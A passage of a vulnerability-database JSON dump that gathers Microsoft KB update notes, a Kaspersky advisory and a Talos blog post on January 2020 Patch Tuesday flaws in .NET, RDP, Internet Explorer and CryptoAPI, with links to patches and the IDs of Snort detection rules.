Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532936\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532936.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:24", "id": "KB4532936", "href": "https://support.microsoft.com/en-us/help/4532936/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4532936 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:50:42", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4534977)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4532958\" managed-link=\"\">4532958</a> <span>Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4532958)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532963\" managed-link=\"\">4532963</a> <span>Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4532963)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532969\" managed-link=\"\">4532969</a> <span>Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532969)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4532950\" managed-link=\"\">4532950</a> <span>Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4532950)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:28", "id": "KB4534977", "href": "https://support.microsoft.com/en-us/help/4534977/", "published": "2020-01-14T17:56:28", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4534977)", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:44:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "<html><body><p>January 14, 2020-KB4532935 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>January 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. <br/><br/> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul class=\"sbody-free_list\"> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0606</a> </li> <li> <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0646</a> </li> </ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532935\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532935.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 4, "modified": "2020-01-14T17:56:24", "id": "KB4532935", "href": "https://support.microsoft.com/en-us/help/4532935/", "published": "2020-01-14T00:00:00", "title": "January 14, 2020-KB4532935 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:43:51", "bulletinFamily": "info", "cvelist": ["CVE-2020-0646", "CVE-2020-0603", "CVE-2020-0602", "CVE-2020-0606", "CVE-2020-0605"], "description": "### *Detect date*:\n01/14/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Developer Tools. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\n.NET Core 3.0 \nASP.NET Core 3.0 \nASP.NET Core 2.1 \nMicrosoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 3.5 AND 4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 3.5 AND 4.7.2 \nMicrosoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.2 \nMicrosoft .NET Framework 4.8 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5 AND 4.8 \n.NET Core 3.1 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 3.0 Service Pack 2 \nASP.NET Core 3.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-0603](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0603>) \n[CVE-2020-0602](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0602>) \n[CVE-2020-0605](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0605>) \n[CVE-2020-0646](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0646>) \n[CVE-2020-0606](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-0606>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft .NET Framework](<https://threats.kaspersky.com/en/product/Microsoft-.NET-Framework/>)\n\n### *CVE-IDS*:\n[CVE-2020-0603](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0603>)0.0Unknown \n[CVE-2020-0602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0602>)0.0Unknown \n[CVE-2020-0605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0605>)0.0Unknown \n[CVE-2020-0646](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0646>)0.0Unknown \n[CVE-2020-0606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0606>)0.0Unknown\n\n### *KB list*:\n[4535101](<http://support.microsoft.com/kb/4535101>) \n[4534306](<http://support.microsoft.com/kb/4534306>) \n[4534978](<http://support.microsoft.com/kb/4534978>) \n[4534976](<http://support.microsoft.com/kb/4534976>) \n[4532933](<http://support.microsoft.com/kb/4532933>) \n[4534276](<http://support.microsoft.com/kb/4534276>) \n[4532938](<http://support.microsoft.com/kb/4532938>) \n[4532936](<http://support.microsoft.com/kb/4532936>) \n[4534271](<http://support.microsoft.com/kb/4534271>) \n[4534979](<http://support.microsoft.com/kb/4534979>) \n[4532935](<http://support.microsoft.com/kb/4532935>) \n[4535103](<http://support.microsoft.com/kb/4535103>) \n[4535104](<http://support.microsoft.com/kb/4535104>) \n[4535105](<http://support.microsoft.com/kb/4535105>) \n[4534293](<http://support.microsoft.com/kb/4534293>) \n[4534977](<http://support.microsoft.com/kb/4534977>) \n[4535102](<http://support.microsoft.com/kb/4535102>) \n[4556826](<http://support.microsoft.com/kb/4556826>) \n[4556813](<http://support.microsoft.com/kb/4556813>) \n[4556812](<http://support.microsoft.com/kb/4556812>) \n[4556807](<http://support.microsoft.com/kb/4556807>) \n[4556406](<http://support.microsoft.com/kb/4556406>) \n[4556405](<http://support.microsoft.com/kb/4556405>) \n[4556404](<http://support.microsoft.com/kb/4556404>) \n[4556403](<http://support.microsoft.com/kb/4556403>) \n[4556402](<http://support.microsoft.com/kb/4556402>) \n[4556401](<http://support.microsoft.com/kb/4556401>) \n[4556400](<http://support.microsoft.com/kb/4556400>) \n[4556441](<http://support.microsoft.com/kb/4556441>) \n[4552929](<http://support.microsoft.com/kb/4552929>) \n[4552926](<http://support.microsoft.com/kb/4552926>) \n[4552931](<http://support.microsoft.com/kb/4552931>) \n[4556399](<http://support.microsoft.com/kb/4556399>) \n[4552928](<http://support.microsoft.com/kb/4552928>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-17T00:00:00", "published": "2020-01-14T00:00:00", "id": "KLA11634", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11634", "title": "\r KLA11634Multiple vulnerabilities in Microsoft Developer Tools ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-01-17T23:27:08", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0601", "CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0616", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0621", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0624", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0636", "CVE-2020-0637", "CVE-2020-0638", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646", "CVE-2020-0647", "CVE-2020-0650", "CVE-2020-0651", "CVE-2020-0652", "CVE-2020-0653", "CVE-2020-0654", "CVE-2020-0656"], "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n_ \n_**Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by **_**spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority.**_ \n \nMicrosoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's [Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Jan>) covers 49 vulnerabilities, eight of which are considered critical. \n \nThis month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs [says the vulnerability is so serious](<https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/>), Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n \nJanuary's update is also the last that will provide free updates to Windows 7 and Windows Server 2008/2008 R2. \n \nTalos also released a new set of [SNORT\u24c7 rules](<https://snort.org/advisories/talos-rules-2020-01-14>) that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed eight critical vulnerabilities this month, all of which we will highlight below. \n \n[CVE-2020-0603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603>), [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605>), [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606>) and [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0646>) are all remote code execution vulnerabilities in the .NET and ASP.NET core software. All four of these vulnerabilities can be triggered if a user opens a malicious, specially crafted file while using an affected version of .NET or ASP.NET Core. If successful, an attacker could then execute arbitrary code in the context of the current user. These bugs exist in how the software handles objects in memory. \n \n[CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>) are remote code execution vulnerabilities in the Windows Remote Desktop Protocol Gateway Server. An attacker could exploit these bugs by sending a specially crafted request to the victim's system RDP Gateway via RDP. This vulnerability is pre-authentication and does not require any user interaction. \n \n[CVE-2020-0611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0611>) is a remote code execution vulnerability in the Windows Remote Desktop Protocol client. This vulnerability can be triggered if a user visits a malicious, specially crafted server. An attacker would need to trick the user into connecting to this server, either via a malicious file or a man-in-the-middle technique. The attacker could then execute arbitrary code on the victim's machine. \n \n[CVE-2020-0640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0640>) is a memory corruption vulnerability that exists in the way the Internet Explorer web browser handles objects in memory. An attacker could use this bug to corrupt the victim machine, and then gain the ability to execute arbitrary code. A user can trigger this vulnerability by visiting a malicious, attacker-controlled web page in Internet Explorer. \n \n\n\n### Important vulnerabilities\n\nThis release also contains 41 important vulnerabilities, three of which we will highlight below. \n \n[CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a spoofing vulnerability in Windows CryptoAPI. The specific component, crypt32.dll, improperly validates Elliptic Curve Cryptography certificates. An attacker could exploit this bug to spoof a code-signing certificate and secretly sign a file, making that file appear as if it is from a trusted source. A malicious actor could also use this vulnerability to conduct man-in-the-middle attacks and decrypt confidential information. \n \n[CVE-2020-0616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0616>) is a denial-of-service vulnerability in Windows due to the way the operating system handles hard links. An attacker needs to log onto the victim machine to exploit this bug, and then run a specially crafted application that would allow them to overwrite system files. \n \n[CVE-2020-0654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0654>) is a vulnerability in the OneDrive app for Android devices that could allow an attacker to bypass certain security features. If the user access a link to a file on a OneDrive folder a certain way, they could bypass the passcode or fingerprint requirements for the app. \n \nThe other important vulnerabilities are: \n\n\n * [CVE-2020-0602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602>)\n * [CVE-2020-0607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0607>)\n * [CVE-2020-0608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0608>)\n * [CVE-2020-0612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0612>)\n * [CVE-2020-0613](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0613>)\n * [CVE-2020-0614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0614>)\n * [CVE-2020-0615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0615>)\n * [CVE-2020-0617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0617>)\n * [CVE-2020-0620](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0620>)\n * [CVE-2020-0621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0621>)\n * [CVE-2020-0622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0622>)\n * [CVE-2020-0623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0623>)\n * [CVE-2020-0624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0624>)\n * [CVE-2020-0625](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0625>)\n * [CVE-2020-0626](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0626>)\n * [CVE-2020-0627](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0627>)\n * [CVE-2020-0628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0628>)\n * [CVE-2020-0629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0629>)\n * [CVE-2020-0630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0630>)\n * [CVE-2020-0631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0631>)\n * [CVE-2020-0632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0632>)\n * [CVE-2020-0633](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0633>)\n * [CVE-2020-0634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0634>)\n * [CVE-2020-0635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0635>)\n * [CVE-2020-0636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0636>)\n * [CVE-2020-0637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0637>)\n * [CVE-2020-0638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0638>)\n * [CVE-2020-0639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0639>)\n * [CVE-2020-0641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0641>)\n * [CVE-2020-0642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642>)\n * [CVE-2020-0643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0643>)\n * [CVE-2020-0644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0644>)\n * [CVE-2020-0647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0647>)\n * [CVE-2020-0650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0650>)\n * [CVE-2020-0651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0651>)\n * [CVE-2020-0652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0652>)\n * [CVE-2020-0653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0653>)\n * [CVE-2020-0656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0656>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 52593 - 52596, 52604, 52605 \n \n\n\n#### AMP Advanced Custom Detection (ACD) signature\n\n \nWhile there can be multiple ways that an attacker can exploit CVE-2020-0601, AMP can be used to detect spoofed certificates that are masquerading as a Microsoft ECC Certificate Authority by adding an advanced custom detection signature. The process to add this signature can be found in the [AMP documentation](<https://docs.amp.cisco.com/AMP%20for%20Endpoints%20User%20Guide.pdf>) on page 33 in the Outbreak Control section under custom detections. The actual custom signature that needs to be added can be downloaded [here](<https://blogs.cisco.com/cve-2020-0601-2>). \n\n", "modified": "2020-01-17T10:14:27", "published": "2020-01-17T10:14:27", "id": "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6XqA-qeq9Xs/microsoft-patch-tuesday-jan-2020.html", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Jan. 2020: Vulnerability disclosures and Snort coverage", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
